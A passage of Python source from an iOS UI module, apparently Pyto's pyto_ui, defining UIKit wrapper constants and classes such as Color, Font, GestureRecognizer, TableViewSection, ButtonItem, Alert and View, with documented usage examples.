TABLE_VIEW_STYLE_PLAIN = ui_constants.TABLE_VIEW_STYLE_PLAIN
"""
A plain table view.
"""
TABLE_VIEW_STYLE_GROUPED = ui_constants.TABLE_VIEW_STYLE_GROUPED
"""
A table view whose sections present distinct groups of rows.
"""
# MARK: - Text Field Border Style
TEXT_FIELD_BORDER_STYLE = ui_constants.TEXT_FIELD_BORDER_STYLE
TEXT_FIELD_BORDER_STYLE_NONE = ui_constants.TEXT_FIELD_BORDER_STYLE_NONE
"""
The text field does not display a border.
"""
TEXT_FIELD_BORDER_STYLE_BEZEL = ui_constants.TEXT_FIELD_BORDER_STYLE_BEZEL
"""
Displays a bezel-style border for the text field. This style is typically used for standard data-entry fields.
"""
TEXT_FIELD_BORDER_STYLE_LINE = ui_constants.TEXT_FIELD_BORDER_STYLE_LINE
"""
Displays a thin rectangle around the text field.
"""
TEXT_FIELD_BORDER_STYLE_ROUNDED_RECT = ui_constants.TEXT_FIELD_BORDER_STYLE_ROUNDED_RECT
"""
Displays a rounded-style border for the text field.
"""
# MARK: - Button Item Style
BUTTON_ITEM_STYLE = ui_constants.BUTTON_ITEM_STYLE
BUTTON_ITEM_STYLE_PLAIN = ui_constants.BUTTON_ITEM_STYLE_PLAIN
"""
Glows when tapped. The default item style.
"""
BUTTON_ITEM_STYLE_DONE = ui_constants.BUTTON_ITEM_STYLE_DONE
"""
The style for a done button—for example, a button that completes some task and returns to the previous view.
"""
# MARK: - Button Item System Item
SYSTEM_ITEM = ui_constants.SYSTEM_ITEM
SYSTEM_ITEM_ACTION = ui_constants.SYSTEM_ITEM_ACTION
"""
The system action button.
"""
SYSTEM_ITEM_ADD = ui_constants.SYSTEM_ITEM_ADD
"""
The system plus button containing an icon of a plus sign.
"""
SYSTEM_ITEM_BOOKMARKS = ui_constants.SYSTEM_ITEM_BOOKMARKS
"""
The system bookmarks button.
"""
SYSTEM_ITEM_CAMERA = ui_constants.SYSTEM_ITEM_CAMERA
"""
The system camera button.
"""
SYSTEM_ITEM_CANCEL = ui_constants.SYSTEM_ITEM_CANCEL
"""
The system Cancel button, localized.
"""
SYSTEM_ITEM_COMPOSE = ui_constants.SYSTEM_ITEM_COMPOSE
"""
The system compose button.
"""
SYSTEM_ITEM_DONE = ui_constants.SYSTEM_ITEM_DONE
"""
The system Done button, localized.
"""
SYSTEM_ITEM_EDIT = ui_constants.SYSTEM_ITEM_EDIT
"""
The system Edit button, localized.
"""
SYSTEM_ITEM_FAST_FORWARD = ui_constants.SYSTEM_ITEM_FAST_FORWARD
"""
The system fast forward button.
"""
SYSTEM_ITEM_FLEXIBLE_SPACE = ui_constants.SYSTEM_ITEM_FLEXIBLE_SPACE
"""
Blank space to add between other items. The space is distributed equally between the other items. Other item properties are ignored when this value is set.
"""
SYSTEM_ITEM_ORGANIZE = ui_constants.SYSTEM_ITEM_ORGANIZE
"""
The system organize button.
"""
SYSTEM_ITEM_PAUSE = ui_constants.SYSTEM_ITEM_PAUSE
"""
The system pause button.
"""
SYSTEM_ITEM_PLAY = ui_constants.SYSTEM_ITEM_PLAY
"""
The system play button.
"""
SYSTEM_ITEM_REDO = ui_constants.SYSTEM_ITEM_REDO
"""
The system redo button.
"""
SYSTEM_ITEM_REFRESH = ui_constants.SYSTEM_ITEM_REFRESH
"""
The system refresh button.
"""
SYSTEM_ITEM_REPLY = ui_constants.SYSTEM_ITEM_REPLY
"""
The system reply button.
"""
SYSTEM_ITEM_REWIND = ui_constants.SYSTEM_ITEM_REWIND
"""
The system rewind button.
"""
SYSTEM_ITEM_SAVE = ui_constants.SYSTEM_ITEM_SAVE
"""
The system Save button, localized.
"""
SYSTEM_ITEM_SEARCH = ui_constants.SYSTEM_ITEM_SEARCH
"""
The system search button.
"""
SYSTEM_ITEM_STOP = ui_constants.SYSTEM_ITEM_STOP
"""
The system stop button.
"""
SYSTEM_ITEM_TRASH = ui_constants.SYSTEM_ITEM_TRASH
"""
The system trash button.
"""
SYSTEM_ITEM_UNDO = ui_constants.SYSTEM_ITEM_UNDO
"""
The system undo button.
"""
###############
# MARK: - Other Classes
###############
# MARK: - Color
class Color:
"""
A ``Color`` object represents a color to be displayed on screen.
Example:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
# RGB
black = ui.Color.rgb(0, 0, 0, 1)
# White
white = ui.Color.white(1, 1)
# Dynamic
background = ui.Color.dynamic(light=white, dark=black)
For pre-defined colors, see `Color <constants.html#ui-elements-colors>`_ constants.
"""
__py_color__ = None
def red(self) -> float:
"""
Returns the red value of the color.
:rtype: float
"""
return float(self.__py_color__.red)
def green(self) -> float:
"""
Returns the green value of the color.
:rtype: float
"""
return float(self.__py_color__.green)
def blue(self) -> float:
"""
Returns the blue value of the color.
:rtype: float
"""
return float(self.__py_color__.blue)
def alpha(self) -> float:
"""
Returns the alpha value of the color.
:rtype: float
"""
return float(self.__py_color__.alpha)
def __init__(self, py_color):
self.__py_color__ = py_color
def __repr__(self):
return str(self.__py_color__.managed.description)
@classmethod
def rgb(cls, red: float, green: float, blue, alpha: float) -> Color:
"""
Initializes a color from RGB values.
All values should be located between 0 and 1, not between 0 and 255.
:param red: The red value.
:param green: The geen value.
:param blue: The blue value.
:param alpha: The opacity value.
:rtype: Color
"""
return cls(__PyColor__.colorWithRed(red, green=green, blue=blue, alpha=alpha))
@classmethod
def white(cls, white: float, alpha: float) -> Color:
"""
Initializes and returns a color from white value.
All values should be located between 0 and 1, not between 0 and 255.
:param white: The grayscale value.
:param alpha: The opacity value.
:rtype: Color
"""
return cls(__PyColor__.colorWithWhite(white, alpha=alpha))
@classmethod
def dynamic(cls, light: Color, dark: Color) -> Color:
"""
Initializes and returns a color that dynamically changes in dark or light mode.
:param light: :class:`~pyto_ui.Color` object to be displayed in light mode.
:param dark: :class:`~pyto_ui.Color` object to be displayed in dark mode.
:rtype: Color
"""
return cls(__PyColor__.colorWithLight(light.__py_color__, dark=dark.__py_color__))
COLOR_LABEL = Color(ui_constants.COLOR_LABEL)
""" The color for text labels containing primary content. """
COLOR_SECONDARY_LABEL = Color(ui_constants.COLOR_SECONDARY_LABEL)
""" The color for text labels containing secondary content. """
COLOR_TERTIARY_LABEL = Color(ui_constants.COLOR_TERTIARY_LABEL)
""" The color for text labels containing tertiary content. """
COLOR_QUATERNARY_LABEL = Color(ui_constants.COLOR_QUATERNARY_LABEL)
""" The color for text labels containing quaternary content. """
COLOR_SYSTEM_FILL = Color(ui_constants.COLOR_SYSTEM_FILL)
""" An overlay fill color for thin and small shapes. """
COLOR_SECONDARY_SYSTEM_FILL = Color(ui_constants.COLOR_SECONDARY_SYSTEM_FILL)
""" An overlay fill color for medium-size shapes. """
COLOR_TERTIARY_SYSTEM_FILL = Color(ui_constants.COLOR_TERTIARY_SYSTEM_FILL)
""" An overlay fill color for large shapes. """
COLOR_QUATERNARY_SYSTEM_FILL = Color(ui_constants.COLOR_QUATERNARY_SYSTEM_FILL)
""" An overlay fill color for large areas containing complex content. """
COLOR_PLACEHOLDER_TEXT = Color(ui_constants.COLOR_PLACEHOLDER_TEXT)
""" The color for placeholder text in controls or text views. """
COLOR_SYSTEM_BACKGROUND = Color(ui_constants.COLOR_SYSTEM_BACKGROUND)
""" The color for the main background of your interface. """
COLOR_SECONDARY_SYSTEM_BACKGROUND = Color(
ui_constants.COLOR_SECONDARY_SYSTEM_BACKGROUND
)
""" The color for content layered on top of the main background. """
COLOR_TERTIARY_SYSTEM_BACKGROUND = Color(ui_constants.COLOR_TERTIARY_SYSTEM_BACKGROUND)
""" The color for content layered on top of secondary backgrounds. """
COLOR_SYSTEM_GROUPED_BACKGROUND = Color(ui_constants.COLOR_SYSTEM_GROUPED_BACKGROUND)
""" The color for the main background of your grouped interface. """
COLOR_SECONDARY_GROUPED_BACKGROUND = Color(
ui_constants.COLOR_SECONDARY_GROUPED_BACKGROUND
)
""" The color for content layered on top of the main background of your grouped interface. """
COLOR_TERTIARY_GROUPED_BACKGROUND = Color(
ui_constants.COLOR_TERTIARY_GROUPED_BACKGROUND
)
""" The color for content layered on top of secondary backgrounds of your grouped interface. """
COLOR_SEPARATOR = Color(ui_constants.COLOR_SEPARATOR)
""" The color for thin borders or divider lines that allows some underlying content to be visible. """
COLOR_OPAQUE_SEPARATOR = Color(ui_constants.COLOR_OPAQUE_SEPARATOR)
""" The color for borders or divider lines that hide any underlying content. """
COLOR_LINK = Color(ui_constants.COLOR_LINK)
""" The color for links. """
COLOR_DARK_TEXT = Color(ui_constants.COLOR_DARK_TEXT)
""" The nonadaptable system color for text on a light background. """
COLOR_LIGHT_TEXT = Color(ui_constants.COLOR_LIGHT_TEXT)
""" The nonadaptable system color for text on a dark background. """
COLOR_SYSTEM_BLUE = Color(ui_constants.COLOR_SYSTEM_BLUE)
""" A blue color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_GREEN = Color(ui_constants.COLOR_SYSTEM_GREEN)
""" A green color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_INDIGO = Color(ui_constants.COLOR_SYSTEM_INDIGO)
""" An indigo color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_ORANGE = Color(ui_constants.COLOR_SYSTEM_ORANGE)
""" An orange color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_PINK = Color(ui_constants.COLOR_SYSTEM_PINK)
""" A pink color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_PURPLE = Color(ui_constants.COLOR_SYSTEM_PURPLE)
""" A purple color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_RED = Color(ui_constants.COLOR_SYSTEM_RED)
""" A red color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_TEAL = Color(ui_constants.COLOR_SYSTEM_TEAL)
""" A teal color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_YELLOW = Color(ui_constants.COLOR_SYSTEM_YELLOW)
""" A yellow color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_GRAY = Color(ui_constants.COLOR_SYSTEM_GRAY)
""" The base gray color. """
COLOR_SYSTEM_GRAY2 = Color(ui_constants.COLOR_SYSTEM_GRAY2)
""" A second-level shade of grey. """
COLOR_SYSTEM_GRAY3 = Color(ui_constants.COLOR_SYSTEM_GRAY3)
""" A third-level shade of grey. """
COLOR_SYSTEM_GRAY4 = Color(ui_constants.COLOR_SYSTEM_GRAY4)
""" A fourth-level shade of grey. """
COLOR_SYSTEM_GRAY5 = Color(ui_constants.COLOR_SYSTEM_GRAY5)
""" A fifth-level shade of grey. """
COLOR_SYSTEM_GRAY6 = Color(ui_constants.COLOR_SYSTEM_GRAY6)
""" A sixth-level shade of grey. """
COLOR_CLEAR = Color(ui_constants.COLOR_CLEAR)
""" A color object with grayscale and alpha values that are both 0.0. """
COLOR_BLACK = Color(ui_constants.COLOR_BLACK)
""" A color object in the sRGB color space with a grayscale value of 0.0 and an alpha value of 1.0. """
COLOR_BLUE = Color(ui_constants.COLOR_BLUE)
""" A color object with RGB values of 0.0, 0.0, and 1.0 and an alpha value of 1.0. """
COLOR_BROWN = Color(ui_constants.COLOR_BROWN)
""" A color object with RGB values of 0.6, 0.4, and 0.2 and an alpha value of 1.0. """
COLOR_CYAN = Color(ui_constants.COLOR_CYAN)
""" A color object with RGB values of 0.0, 1.0, and 1.0 and an alpha value of 1.0. """
COLOR_DARK_GRAY = Color(ui_constants.COLOR_DARK_GRAY)
""" A color object with a grayscale value of 1/3 and an alpha value of 1.0. """
COLOR_GRAY = Color(ui_constants.COLOR_GRAY)
""" A color object with a grayscale value of 0.5 and an alpha value of 1.0. """
COLOR_GREEN = Color(ui_constants.COLOR_GREEN)
""" A color object with RGB values of 0.0, 1.0, and 0.0 and an alpha value of 1.0. """
COLOR_LIGHT_GRAY = Color(ui_constants.COLOR_LIGHT_GRAY)
""" A color object with a grayscale value of 2/3 and an alpha value of 1.0. """
COLOR_MAGENTA = Color(ui_constants.COLOR_MAGENTA)
""" A color object with RGB values of 1.0, 0.0, and 1.0 and an alpha value of 1.0. """
COLOR_ORANGE = Color(ui_constants.COLOR_ORANGE)
""" A color object with RGB values of 1.0, 0.5, and 0.0 and an alpha value of 1.0. """
COLOR_PURPLE = Color(ui_constants.COLOR_PURPLE)
""" A color object with RGB values of 0.5, 0.0, and 0.5 and an alpha value of 1.0. """
COLOR_RED = Color(ui_constants.COLOR_RED)
""" A color object with RGB values of 1.0, 0.0, and 0.0 and an alpha value of 1.0. """
COLOR_WHITE = Color(ui_constants.COLOR_WHITE)
""" A color object with a grayscale value of 1.0 and an alpha value of 1.0. """
COLOR_YELLOW = Color(ui_constants.COLOR_YELLOW)
""" A color object with RGB values of 1.0, 1.0, and 0.0 and an alpha value of 1.0. """
# MARK: - Font
class Font:
"""
A ``Font`` object represents a font (with name and size) to be used on labels, buttons, text views etc.
"""
__ui_font__ = None
def __init__(self, name: str, size: float):
"""
Initializes a font with given name and size.
:pram name: The fully specified name of the font. This name incorporates both the font family name and the specific style information for the font.
:param size: The size (in points) to which the font is scaled. This value must be greater than 0.0.
"""
if name is None and size is None:
return
self.__ui_font__ = __UIFont__.fontWithName(name, size=CGFloat(size))
def __repr__(self):
return str(self.__ui_font__.description)
def with_size(self, size: float) -> Font:
"""
Returns a font object that is the same as the receiver but which has the specified size instead.
:param size: The desired size (in points) of the new font object. This value must be greater than 0.0.
:rtype: Font
"""
font = self.__class__(None, None)
font.__ui_font__ = self.__ui_font__.fontWithSize(CGFloat(size))
return font
@classmethod
def font_names_for_family_name(cls, name: str) -> List[str]:
"""
Returns an array of font names available in a particular font family.
:param name: The name of the font family. Use the :func:`~pyto_ui.font_family_names` function to get an array of the available font family names on the system.
:rtype: List[str]
"""
names = __UIFont__.fontNamesForFamilyName(name)
py_names = []
for name in names:
py_names.append(str(name))
return py_names
@classmethod
def system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items in the specified size.
:param size: The size (in points) to which the font is scaled. This value must be greater than 0.0.
:rtype: Font
"""
font = cls(None, None)
font.__ui_font__ = __UIFont__.systemFontOfSize(CGFloat(size))
return font
@classmethod
def italic_system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items that are rendered in italic type in the specified size.
:param size: The size (in points) for the font. This value must be greater than 0.0.
:rtype: Font
"""
font = cls(None, None)
font.__ui_font__ = __UIFont__.italicSystemFontOfSize(CGFloat(size))
return font
@classmethod
def bold_system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items that are rendered in boldface type in the specified size
:param size: The size (in points) for the font. This value must be greater than 0.0.
:rtype: Font
"""
font = cls(None, None)
font.__ui_font__ = __UIFont__.boldSystemFontOfSize(CGFloat(size))
return font
@classmethod
def font_with_style(cls, style: FONT_TEXT_STYLE) -> Font:
"""
Returns an instance of the system font for the specified text style and scaled appropriately for the user's selected content size category.
:param style: The text style for which to return a font. See `Font Text Style <constants.html#font-text-style>`_ constants for possible values.
:rtype: Font
"""
font = cls(None, None)
font.__ui_font__ = __UIFont__.preferredFontForTextStyle(style)
return font
# MARK: - Gesture Recognizer
class GestureRecognizer:
"""
A gesture-recognizer object—or, simply, a gesture recognizer—decouples the logic for recognizing a sequence of touches (or other input) and acting on that recognition. When one of these objects recognizes a common gesture or, in some cases, a change in the gesture, it sends an action message to each designated target object.
This class represents the type of gesture passed to the ``type`` initializer parameter. See `Gesture Type <constants.html#gesture-type>`_ constants for possible values.
When the gesture is starting, cancelling or changig, ``action`` is called with the gesture recognizer as parameter. You can then access the location and the state from it.
Example:
.. highlight:: python
.. code-block:: python
'''
Move a circle with finger.
'''
import pyto_ui as ui
view = ui.View()
view.background_color = ui.COLOR_SYSTEM_BACKGROUND
circle = ui.View()
circle.size = (50, 50)
circle.center = (view.width/2, view.height/2)
circle.flexible_margins = True
circle.corner_radius = 25
circle.background_color = ui.COLOR_LABEL
view.add_subview(circle)
def move(sender: ui.GestureRecognizer):
if sender.state == ui.GESTURE_STATE_CHANGED:
circle.center = sender.location
gesture = ui.GestureRecognizer(ui.GESTURE_TYPE_PAN)
gesture.action = move
view.add_gesture_recognizer(gesture)
ui.show_view(view)
"""
__py_gesture__ = None
def __init__(
self, type: GESTURE_TYPE, action: Callable[[GestureRecognizer], None] = None
):
if type.objc_class == __PyGestureRecognizer__:
self.__py_gesture__ = type
else:
self.__py_gesture__ = __PyGestureRecognizer__.newRecognizerWithType(type)
self.__py_gesture__.managedValue = _values.value(self)
if action is not None:
self.action = action
def __repr__(self):
return str(self.__py_gesture__.managed.description)
__x__ = []
__y__ = []
@property
def x(self) -> float:
"""
(Read Only) Returns the X position of the gesture in its container view.
:rtype: float
"""
try:
return self.__x__[0]
except IndexError:
return None
@property
def y(self) -> float:
"""
(Read Only) Returns the Y position of the gesture in its container view.
"""
try:
return self.__y__[0]
except IndexError:
return None
@property
def location(self) -> Tuple[float, float]:
"""
(Read Only) Returns a tuple with the X and the Y position of the gesture in its container view.
:rtype: Tuple[float, float]
"""
tup = (self.x, self.y)
if tup == (None, None):
return None
else:
return tup
@property
def view(self) -> "View":
"""
(Read Only) Returns the view associated with the gesture.
:rtype: View
"""
view = self.__py_gesture__.view
if view is None:
return None
else:
_view = View()
_view.__py_view__ = view
return _view
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the gesture recognizer is enabled.
:rtype: bool
"""
return self.__py_gesture__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_gesture__.enabled = new_value
__number_of_touches__ = None
@property
def number_of_touches(self) -> int:
"""
(Read Only) Returns the number of touches involved in the gesture represented by the receiver.
:rtype: int
"""
if self.__number_of_touches__ is not None:
return self.__number_of_touches__
else:
return self.__py_gesture__.numberOfTouches
__state__ = None
@property
def state(self) -> GESTURE_STATE:
"""
(Read Only) The current state of the gesture recognizer.
:rtype: `Gesture State <constants.html#gesture-state>`_
"""
if self.__state__ is not None:
return self.__state__
else:
return self.__py_gesture__.state
@property
def requires_exclusive_touch_type(self) -> bool:
"""
A Boolean indicating whether the gesture recognizer considers touches of different types simultaneously.
:rtype: bool
"""
return self.__py_gesture__.requiresExclusiveTouchType
@requires_exclusive_touch_type.setter
def requires_exclusive_touch_type(self, new_value: bool):
self.__py_gesture__.requiresExclusiveTouchType = new_value
@property
def delays_touches_ended(self) -> bool:
"""
A Boolean value determining whether the receiver delays sending touches in a end phase to its view.
:rtype: bool
"""
return self.__py_gesture__.delaysTouchesEnded
@delays_touches_ended.setter
def delays_touches_ended(self, new_value: bool):
self.__py_gesture__.delaysTouchesEnded = new_value
@property
def delays_touches_began(self) -> bool:
"""
A Boolean value determining whether the receiver delays sending touches in a begin phase to its view.
:rtype: bool
"""
return self.__py_gesture__.delaysTouchesBegan
@delays_touches_began.setter
def delays_touches_began(self, new_value: bool):
self.__py_gesture__.delaysTouchesBegan = new_value
@property
def cancels_touches_in_view(self) -> bool:
"""
A Boolean value affecting whether touches are delivered to a view when a gesture is recognized.
:rtype: bool
"""
return self.__py_gesture__.cancelsTouchesInView
@cancels_touches_in_view.setter
def cancels_touches_in_view(self, new_value: bool):
self.__py_gesture__.cancelsTouchesInView = new_value
@property
def allowed_touch_types(self) -> List[TOUCH_TYPE]:
"""
An array of touch types used to distinguish type of touches. For possible values, see ``Touch Type`` constants.
:rtype: List[`Touch Type <constants.html#touch-type>`_]
"""
return self.__py_gesture__.allowedTouchTypes
@allowed_touch_types.setter
def allowedTouchTypes(self, new_value: List[TOUCH_TYPE]):
self.__py_gesture__.allowedTouchTypes = new_value
@property
def action(self) -> Callable[[GestureRecognizer], None]:
"""
A function called to handle the gesture. Takes the sender gesture recognizer as parameter.
:rtype: Callable[[GestureRecognizer], None]
"""
action = self.__py_gesture__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[GestureRecognizer], None]):
if new_value is None:
self.__py_gesture__.action = None
else:
self.__py_gesture__.action = _values.value(new_value)
# MARK: - Table View Section
class TableViewSection:
"""
An object representing a section in a Table View.
A section has a title and a list of cells contained in.
"""
__py_section__ = None
def __init__(self, title: str, cells: List["TableViewCell"]):
self.__py_section__ = __PyTableViewSection__.new()
self.__py_section__.managedValue = _values.value(self)
self.title = title
self.cells = cells
@property
def table_view(self) -> "TableView":
"""
(Read Only) Returns the Table view associated with the section.
:rtype: TableView
"""
table_view = self.__py_section__.tableView
if table_view is None:
return None
else:
py_table_view = TableView()
py_table_view.__py_view__ = table_view
return py_table_view
@property
def title(self) -> str:
"""
The title of the section displayed on screen.
:rtype: str
"""
return str(self.__py_section__.title)
@title.setter
def title(self, new_value: str):
self.__py_section__.title = new_value
@property
def cells(self) -> "TableViewCell":
"""
Cells contained in the section. After setting a value, the section will be reloaded automatically.
:rtype: TableViewCell
"""
cells = self.__py_section__.cells
py_cells = []
for cell in cells:
py_cell = TableViewCell()
py_cell.__py_view__ = cell
py_cells.append(py_cell)
return py_cells
@cells.setter
def cells(self, new_value: "TableViewCell"):
cells = []
for cell in new_value:
cells.append(cell.__py_view__)
self.__py_section__.cells = cells
@property
def did_select_cell(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when a cell contained in the section is selected. Takes the sender section and the selected cell's index as parameters.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.didSelectCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_select_cell.setter
def did_select_cell(self, new_value: Callable[[TableViewSection, int], None]):
if new_value is None:
self.__py_section__.didSelectCell = None
else:
self.__py_section__.didSelectCell = _values.value(new_value)
@property
def did_tap_cell_accessory_button(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when the accessory button of a cell contained in the section is pressed. Takes the sender section and the cell's index as parameters.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.accessoryButtonTapped
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_tap_cell_accessory_button.setter
def did_tap_cell_accessory_button(
self, new_value: Callable[[TableViewSection, int], None]
):
if new_value is None:
self.__py_section__.accessoryButtonTapped = None
else:
self.__py_section__.accessoryButtonTapped = _values.value(new_value)
@property
def did_delete_cell(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when a cell contained in the section is deleted. Takes the sender section and the selected deleted cell's index as parameters.
This function should be used to remove the data corresponding to the cell from the database.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.didDeleteCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_delete_cell.setter
def did_delete_cell(self, new_value: Callable[[TableViewSection, int], None]):
if new_value is None:
self.__py_section__.didDeleteCell = None
else:
self.__py_section__.didDeleteCell = _values.value(new_value)
@property
def did_move_cell(self) -> Callable[[TableViewSection, int, int], None]:
"""
A function called when a cell contained in the section is moved. Takes the sender section, the moved deleted cell's index and the destination index as parameters.
This function should be used to move the data corresponding to the cell from the database.
:rtype: Callable[[TableViewSection, int, int], None]
"""
action = self.__py_section__.didMoveCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_move_cell.setter
def did_move_cell(self, new_value: Callable[[TableViewSection, int, int], None]):
if new_value is None:
self.__py_section__.didMoveCell = None
else:
self.__py_section__.didMoveCell = _values.value(new_value)
# MARK: - Button Item
class ButtonItem:
"""
A special kind of button that can be placed on the view's navigation bar. Can have a title, and image or a system type.
"""
__py_item__ = None
def __init__(
self,
title: str = None,
image: "Image" = None,
system_item: SYSTEM_ITEM = None,
style: BUTTON_ITEM_STYLE = __v__("BUTTON_ITEM_STYLE_PLAIN"),
):
if style == "BUTTON_ITEM_STYLE_PLAIN":
style = BUTTON_ITEM_STYLE_PLAIN
if system_item is not None:
self.__py_item__ = __PyButtonItem__.alloc().initWithSystemItem(system_item)
else:
self.__py_item__ = __PyButtonItem__.alloc().initWithStyle(style)
self.__py_item__.managedValue = _values.value(self)
self.title = title
self.image = image
def __repr__(self):
return str(self.__py_item__.managed.description)
@property
def title(self) -> str:
"""
The title of the button displayed on screen.
:rtype: str
"""
title = self.__py_item__.title
if title is not None:
return str(title)
else:
return None
@title.setter
def title(self, new_value: str):
self.__py_item__.title = new_value
@property
def image(self) -> "Image":
"""
A ``PIL`` image object displayed on screen. May also be an ``UIKit`` ``UIImage`` symbol. See :func:`~pyto_ui.image_with_system_name`.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_item__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_item__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_item__.image = new_value
else:
self.__py_item__.image = __ui_image_from_pil_image__(new_value)
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the button is enabled.
:rtype: bool
"""
return self.__py_item__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_item__.enabled = new_value
@property
def style(self) -> BUTTON_ITEM_STYLE:
"""
The button item style. See `Button Item Style <constants.html#button-item-style>`_ constants for possible values.
:rtype: `Button Item Style <constants.html#button-item-style>`_
"""
return self.__py_item__.style
@style.setter
def style(self, new_value: BUTTON_ITEM_STYLE):
self.__py_item__.style = new_value
@property
def action(self) -> Callable[[ButtonItem], None]:
"""
A function called when the button item is pressed. Takes the button item as parameter.
:rtype: Callable[[ButtonItem], None]
"""
action = self.__py_item__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[ButtonItem], None]):
if new_value is None:
self.__py_item__.action = None
else:
self.__py_item__.action = _values.value(new_value)
if "widget" not in os.environ:
# MARK: - Alert
class Alert:
"""
A class representing an alert.
Example:
.. highlight:: python
.. code-block:: python
from pyto_ui import Alert
alert = Alert("Hello", "Hello World!")
alert.add_action("Ok")
alert.add_cancel_action("Cancel")
if (alert.show() == "Ok"):
print("Good Bye!")
"""
__pyAlert__ = None
def __init__(self, title: str, message: str):
"""
Creates an alert.
:param title: The title of the alert.
:param message: The message of the alert.
"""
self.__pyAlert__ = __PyAlert__.alloc().init()
self.__pyAlert__.title = title
self.__pyAlert__.message = message
__actions__ = []
def add_action(self, title: str):
"""
Adds an action with given title.
:param title: The title of the action.
"""
self.__pyAlert__.addAction(title)
def add_destructive_action(self, title: str):
"""
Adds a destructive action with given title.
:param title: The title of the action.
"""
self.__pyAlert__.addDestructiveAction(title)
def add_cancel_action(self, title: str):
"""
Adds a cancel action with given title. Can only be added once.
:param title: The title of the action.
"""
if not self.__pyAlert__.addCancelAction(title):
raise ValueError("There is already a cancel action.")
def show(self) -> str:
"""
Shows alert.
Returns the title of the selected action.
:rtype: str
"""
script_path = None
try:
script_path = threading.current_thread().script_path
except AttributeError:
pass
return self.__pyAlert__._show(script_path)
###############
# MARK: - View Classes
###############
class View:
"""
An object that manages the content for a rectangular area on the screen.
"""
__py_view__ = None
def __init__(self):
self.__py_view__ = __PyView__.newView()
def __repr__(self):
return str(self.__py_view__.managed.description)
def __getitem__(self, item):
return self.subview_with_name(item)
@property
def title(self) -> str:
"""
If this view is directly presented, the top bar will show this view's title.
:rtype: str
"""
title = self.__py_view__.title
if title is None:
return title
else:
return str(title)
@title.setter
def title(self, new_value: str):
self.__py_view__.title = new_value
@property
def name(self) -> str:
"""
The name identifying the view. To access a subview with its name, you can use the :func:`~pyto_ui.View.subview_with_name` function. :class:`~pyto_ui.View` is also subscriptable, so you can do something like that:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
button = ui.Button()
button.name = "Button"
view = ui.View()
view.add_subview(button)
view["Button"] # -> Button object
:rtype: str
"""
name = self.__py_view__.name
if name is None:
return name
else:
return str(name)
@name.setter
def name(self, new_value: str):
self.__py_view__.name = new_value
def close(self):
"""
Closes the view, if the receiver object is the root view presented to the user.
"""
self.__py_view__.close()
def push(self, view: View):
"""
Presents the given additional view on top of the receiver.
:param view: The view to present.
"""
self.__py_view__.pushView(view.__py_view__)
def pop(self):
"""
Pops the visible view controller from the navigation controller.
"""
self.__py_view__.pop()
@property
def navigation_bar_hidden(self) -> bool:
"""
A boolean indicating whether the Navigation Bar of the View should be hidden.
:rtype: bool
"""
return self.__py_view__.navigationBarHidden
@navigation_bar_hidden.setter
def navigation_bar_hidden(self, new_value: bool):
self.__py_view__.navigationBarHidden = new_value
@property
def x(self) -> float:
"""
The x-coordinate of the view.
:rtype: float
"""
return self.__py_view__.x
@x.setter
def x(self, new_value: float):
self.__py_view__.x = new_value
@property
def y(self) -> float:
"""
The y-coordinate of the point.
:rtype: float
"""
return self.__py_view__.y
@y.setter
def y(self, new_value: float):
self.__py_view__.y = new_value
@property
def width(self) -> float:
"""
The width of the view.
:rtype: float
"""
return self.__py_view__.width
@width.setter
def width(self, new_value: float):
self.__py_view__.width = new_value
@property
def height(self) -> float:
"""
The height of the view.
:rtype: float
"""
return self.__py_view__.height
@height.setter
def height(self, new_value: float):
self.__py_view__.height = new_value
@property
def center_x(self) -> float:
"""
The center x-coordinate of the view's frame rectangle. Setting this value updates ``frame`` property appropiately.
:rtype: float
"""
return self.__py_view__.centerX
@center_x.setter
def center_x(self, new_value: float):
self.__py_view__.centerX = new_value
@property
def center_y(self) -> float:
"""
The center y-coordinate of the view's frame rectangle. Setting this value updates ``frame`` property appropiately.
:rtype: float
"""
return self.__py_view__.centerY
@center_y.setter
def center_y(self, new_value: float):
self.__py_view__.centerY = new_value
@property
def center(self) -> Tuple[float, float]:
"""
The center point of the view's frame rectangle. Setting this value updates ``frame`` property appropiately.
This value is a tuple with X and Y coordinates.
:rtype: Tuple[float, float]
"""
return (self.center_x, self.center_y)
@center.setter
def center(self, new_value: Tuple[float, float]):
self.center_x, self.center_y = new_value
@property
def size(self) -> Tuple[float, float]:
"""
A size that specifies the height and width of the rectangle.
This value is a tuple with height and width values.
:rtype: Tuple[float, float]
"""
return (self.width, self.height)
@size.setter
